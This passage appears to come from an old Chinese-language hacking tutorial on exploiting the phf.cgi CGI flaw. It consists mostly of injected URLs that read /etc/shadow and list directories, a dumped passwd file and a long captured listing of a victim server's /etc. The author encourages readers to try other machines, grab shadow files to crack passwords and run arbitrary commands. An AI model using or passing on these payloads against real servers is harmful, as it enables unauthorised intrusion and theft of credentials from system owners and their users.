iuucp:x:46:5::/usr/lib/uucp/uucico:/sbin/sh
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
gopher:x:100:1::/usr/local/bin:/usr/local/bin/GopherUserScript
news:x:105:100::/usr/local/etc/innd:/usr/lib/rsh
ftp:x:106:101:Anonymous FTP:/export/ftp:/bin/false
hanshin:x:109:1::/home1/hanshin:/usr/lib/rsh
dayeh:x:110:1::/home1/dayeh:/usr/lib/rsh
ming:x:133:1::/home1/ming:/usr/bin/ksh
charlesl:x:139:1::/home1/charlesl:/usr/lib/rsh
iiimail:x:142:6::/home/iiimail:/usr/lib/rsh
charles.lo:x:156:1::/home1/charles.lo:/usr/lib/rsh
webmaster:x:161:1::/home1/webmaster:/usr/lib/rsh
mark:x:171:1::/home1/mark:/usr/lib/rsh
jcteam:x:172:1::/home1/jcteam:/usr/lib/rsh
ibgchen:x:224:1::/home1/ibgchen:/usr/lib/rsh
但是如果没有, 或是 shadow 的话, 你可能会接著试:
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/shadow
但是有时候虽然 phf.cgi 这个程式的漏洞没有被补上, 还是有很多的机器不理会这个指令, 不过当这
个指令生效, 但是你看到的却是一个 shadow 过的 passwd 的时候, 请不要灰心, 因为这台机器已经在
你的手中了, 为甚么呢 ?? 我们来玩看看一些简单的 Unix shell command 你就会知道了~~
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20-a%20/etc
Query Results
/usr/local/bin/ph -m alias=x /bin/ls -l -a /etc
total 466
-rw-r--r-- 1 root root 38 May 2 1996 #etcnamed.boot#
-rw-r--r-- 1 root root 20579 May 1 1996 #sendmail.cf#
drwxr-xr-x 11 root root 2048 Apr 17 13:07 .
drwxr-xr-x 24 root root 1024 Mar 26 08:16 ..
-rw-r--r-- 1 root root 2167 Aug 24 1995 DIR_COLORS
-rw-r--r-- 1 root root 15 May 1 1996 HOSTNAME
-rw-r--r-- 1 root root 4 Feb 24 1993 NETWORKING
-rw-r--r-- 1 root root 48 Dec 30 1994 NNTP_INEWS_DOMAIN
-rw-r--r-- 1 root root 0 May 13 1994 at.deny
drwxr-xr-x 2 root root 1024 Apr 11 1996 backups
-rw-r--r-- 1 root root 1212 Jul 10 1993 bootptab
-rw-r--r-- 1 root root 0 Feb 15 1994 csh.cshrc
-rw-r--r-- 1 root root 893 Apr 12 1996 csh.login
drwxr-xr-x 2 root root 1024 Apr 16 1996 default
-rw-r--r-- 1 root root 154 Aug 21 1994 exports
-rw-r--r-- 1 root root 0 May 13 1995 fastboot
-rw-r--r-- 1 root root 1118 Jan 28 1994 fdprm
drwxr-xr-x 2 root root 1024 Apr 12 1996 fs
-rw-r--r-- 1 root root 250 Dec 9 19:19 fstab
-rw-r--r-- 1 root root 242 Dec 5 13:55 fstab~
-rw-r--r-- 1 root root 1915 Jan 27 07:46 ftpaccess
-rw-r--r-- 1 root root 368 Aug 1 1994 ftpconversions
-rw-r--r-- 1 root root 0 Aug 9 1994 ftpgroups
-rwxr-xr-x 1 root root 50 May 1 1996 ftponly
-rw-r--r-- 1 root root 501 Apr 26 1996 ftpusers
-rw-r--r-- 1 root root 76 Aug 21 1994 gateways
-rw-r--r-- 1 root root 669 May 19 1994 gettydefs
-rw-r--r-- 1 root root 291 Jun 6 1996 group
-rw-r--r-- 1 root root 27 Jul 7 1994 host.conf
-rw-r--r-- 1 root root 628 Jul 12 1996 hosts
-rw-r--r-- 1 root root 600 Jan 6 10:18 hosts.allow
-rw-r--r-- 1 root root 341 May 9 1996 hosts.deny
-rw-r--r-- 1 root root 313 Mar 16 1994 hosts.equiv
-rw-r--r-- 1 root root 302 Sep 23 1993 hosts.lpd
-rw-r--r-- 1 root root 653 Apr 24 1996 hosts~
lrwxrwxrwx 1 root root 1 Apr 12 1996 inet -> .
-rw-r--r-- 1 root root 3677 Jan 6 10:20 inetd.conf
-rw-r--r-- 1 root root 3664 Apr 23 1996 inetd.conf~
-rw-r--r-- 1 root root 2351 Apr 18 1996 inittab
-rw-r--r-- 1 root root 2046 Jul 28 1994 inittab.gettyps.sample
-rw-r--r-- 1 root root 27 Apr 17 12:43 issue
-rw-r--r-- 1 root root 3 Apr 17 12:43 klogd.pid
-rw-r--r-- 1 root root 1223 Apr 17 12:43 ld.so.cache
-rw-r--r-- 1 root root 71 Aug 14 1995 ld.so.conf
drwxr-xr-x 2 root root 1024 Apr 12 1996 lilo
-rw-r--r-- 1 root root 479 Apr 13 1996 lilo.conf
-rw-r--r-- 1 root root 479 Apr 13 1996 lilo.conf.bak
-rw-r--r-- 1 root root 266 Apr 17 12:42 localtime
-rw-r--r-- 1 root root 76873 Oct 17 1995 magic
-r--r--r-- 1 root root 105 May 8 1994 mail.rc
-rw-r--r-- 1 root root 14 Apr 17 12:43 motd
drwxr-xr-x 2 root root 1024 Aug 1 1994 msgs
-rw-r--r-- 1 root root 151 Apr 17 20:43 mtab
-rw-r--r-- 1 root root 833 Jun 29 1994 mtools
-r--r--r-- 1 root root 974 Apr 17 11:48 named.boot
-r--r--r-- 1 root root 2568 May 2 1996 named.boot,v
-r--r--r-- 1 root root 764 Mar 8 16:54 named.boot.v1
-r--r--r-- 1 root root 813 Mar 17 08:45 named.boot.v2
-r--r--r-- 1 root root 521 Apr 18 1996 named.boot.~1.3~
-r--r--r-- 1 root root 566 Apr 19 1996 named.boot.~1.4~
-r--r--r-- 1 root root 566 Apr 19 1996 named.boot.~1.5~
-r--r--r-- 1 root root 707 Mar 5 08:32 named.boot.~1.6~
-rw-r--r-- 1 root root 566 Apr 19 1996 named.boot~
-rw-r--r-- 1 root root 235 May 1 1996 networks
-rw-r--r-- 1 root root 237 Apr 24 1996 networks~
-rw-r--r-- 1 root root 0 May 8 1995 nntpserver
-rw-r--r-- 1 root root 36 Sep 12 1994 organization
-rw-r--r-- 1 root root 1727 Apr 17 13:07 passwd
-r--r--r-- 1 root root 1662 Apr 17 13:06 passwd-
-rw-r--r-- 1 root root 1715 Apr 17 13:06 passwd.OLD
-rw-r--r-- 1 root root 1494 Feb 12 14:22 passwd.old
-rw-r--r-- 1 root root 1354 Jun 6 1996 passwd~
drwxr-xr-x 2 root root 1024 Jul 9 1994 ppp
-rw-r--r-- 1 root root 2240 May 20 1994 printcap
-rw-r--r-- 1 root root 1083 Apr 12 1996 profile
-rw-r--r-- 1 root root 595 Aug 21 1994 protocols
drwxr-xr-x 2 root root 1024 Jan 3 23:59 rc.d
-rw-r--r-- 1 root root 41 May 1 1996 resolv.conf
-rw-r--r-- 1 root root 65 Jan 31 1996 resolv.conf~
-rw-r--r-- 1 root root 743 Aug 1 1994 rpc
-rw-r--r-- 1 root root 87 Jun 6 1996 securetty
-r--r--r-- 1 root root 20579 May 1 1996 sendmail.cf
-r--r--r-- 1 root root 21332 May 1 1996 sendmail.cf,v
-rw-r--r-- 1 root root 20541 Apr 13 1996 sendmail.cf~
-rw-r--r-- 1 root root 408 Apr 25 17:17 sendmail.st
-rw-r--r-- 1 root root 5575 Aug 1 1994 services
-rw-r--r-- 1 root root 68 Jun 6 1996 shells
drwxr-xr-x 3 root root 1024 Nov 13 1994 skel
-rw-r--r-- 1 root root 314 Jan 10 1995 slip.hosts
-rw-r--r-- 1 root root 342 Jan 10 1995 slip.login
-rw-r--r-- 1 root root 455 Aug 1 1994 snooptab
-rw------- 1 root users 524 Jul 18 1996 ssh_host_key
-rw-r--r-- 1 root users 327 Jul 18 1996 ssh_host_key.pub
-rw------- 1 root users 512 Mar 10 09:03 ssh_random_seed
-rw-r--r-- 1 root users 607 Jul 18 1996 sshd_config
-rw-r----- 1 root root 501 Apr 26 1996 syslog.conf
-rw-r--r-- 1 root root 3 Apr 17 12:43 syslog.pid
-rw-r--r-- 1 root root 183942 Aug 9 1995 termcap
-rw-r--r-- 1 root root 126 Nov 24 1993 ttys
lrwxrwxrwx 1 root root 13 Apr 12 1996 utmp -> /var/adm/utmp
drwxr-xr-x 2 root root 1024 Aug 25 1995 vga
lrwxrwxrwx 1 root root 13 Apr 12 1996 wtmp -> /var/adm/wtmp
-rw-r--r-- 1 root root 76 May 8 1995 yp.conf.example
lrwxrwxrwx 1 root root 7 Apr 12 1996 zprofile -> profile
上面的 %20 所代表的是 [Space] 也就是空白键啦! 那上面这个 Location 就如同我们已经 Telnet 到
这台机器上, 下了: ls -l -a /etc 这个指令一样, 嗯... 也就是说....$^^*^$@@#
OK! 当你抓 /etc/passwd 所抓到的是 shadow 过的 passwd 档, 你一定会要抓真正的 shadow 档来作
"配对" 的动作... 所以呢, 下了 ls 指令来找找看到底真的 shadow 是藏在哪里, 当然你可以看的不
只是 /etc 这个目录, 任何目录你都可以看, 当然你可以使用的也不只是 cat 及 ls 这两个指令, 你
可以用更多的指令~~ 那么还有甚么作不到的呢 ??? 我想可能还是有很多哩~~ 因为 phf.cgi 好像只
把你所下的指令丢给 shell 後直接拦下它输出的结果, 也就是如果像是 /bin/passwd userid 这样的
指令就不能用~ 因为它会要等你输入下一个字串~~ 除非先写入一个档案, 然後用来代入 "<".. 嗯..
最近很忙, 没有空作这些无聊事, 不过 phf.cgi 还真的蛮好玩的, 我已经试了好几台机器都可以看到
文件内容及档案, 目录... 当然~ 没有破坏就是了~~
经过这样的说明, 你是不是有些 Idea ?? 还是记起以前有试过其它的机器的 phf.cgi 也可以这样子
玩的 ?? 嗯~ 再连过去玩玩看吧! 发挥一下你的想像力~~ /etc/passwd 很容易就可以得手的喔~~ 对
了~ 不要乱搞政府机关 or 你们的学校啦!!~~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- |